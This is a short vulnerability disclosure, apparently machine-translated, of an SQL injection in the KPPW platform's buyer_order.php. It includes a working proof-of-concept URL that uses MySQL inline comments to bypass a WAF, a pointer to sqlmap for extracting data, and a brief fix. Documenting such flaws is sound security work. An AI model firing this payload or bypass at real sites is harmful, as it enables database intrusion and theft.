KPPW latest SQL injection vulnerability 1
KPPW Latest Version SQL injection 1
KPPW Latest Version SQL injection 1
File/control/gy/buyer_order.php
Switch ($ step ){...... case 'step5': if ($ arrServiceOrderInfo ['workfile']) {$ arrFileLists = db_factory: query ('select file_name, save_name from '. TABLEPRE. 'witkey _ file where file_id in ('. $ arrServiceOrderInfo ['workfile']. ');} if (isset ($ action) {switch ($ action) {case 'access': $ objShop = new service_shop_class (); $ resText = $ objShop-> dispose_order ($ orderId, 'complete'); unset ($ objShop); if (true ===$ resText) {kekezu :: show_msg ('order processed, this order completed ', $ strUrl. "& step = step6 & orderId = ". $ orderId, 3, null, 'OK');} else {kekezu: show_msg ($ resText, null, 'fail ');} break; default: kekezu: show_msg ('Access page does not exist', 'index. php ', 3, null, 'warning'); break;} break;
Note:
if($arrServiceOrderInfo['workfile']){$arrFileLists = db_factory::query('select file_name,save_name from '.TABLEPRE.'witkey_file where file_id in('.$arrServiceOrderInfo['workfile'].')');}
$ ArrServiceOrderInfo ['workfile'] directly enters the SQL statement, resulting in SQL Injection
Why is there a naked injection?
Waf is available here, but it is very simple. You can bypass inline annotations.
POC:
http://localhost/KPPW2520141118UTF-8/index.php?do=gy&view=buyer_order&step=step5&arrServiceOrderInfo[workfile]=123) and 1=2 /*!50000union*/ select 1,2 from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
Lead to blind Injection
View the mysql execution log:
Bypass and execute
View the execution result of this statement:
Because it is a blind note, the data cannot be displayed. If you want to run the data, you can use sqlmap.
Solution:
Variable $ arrFileLists is not used here. I don't know what it is. Delete it.
Or use quotation marks to protect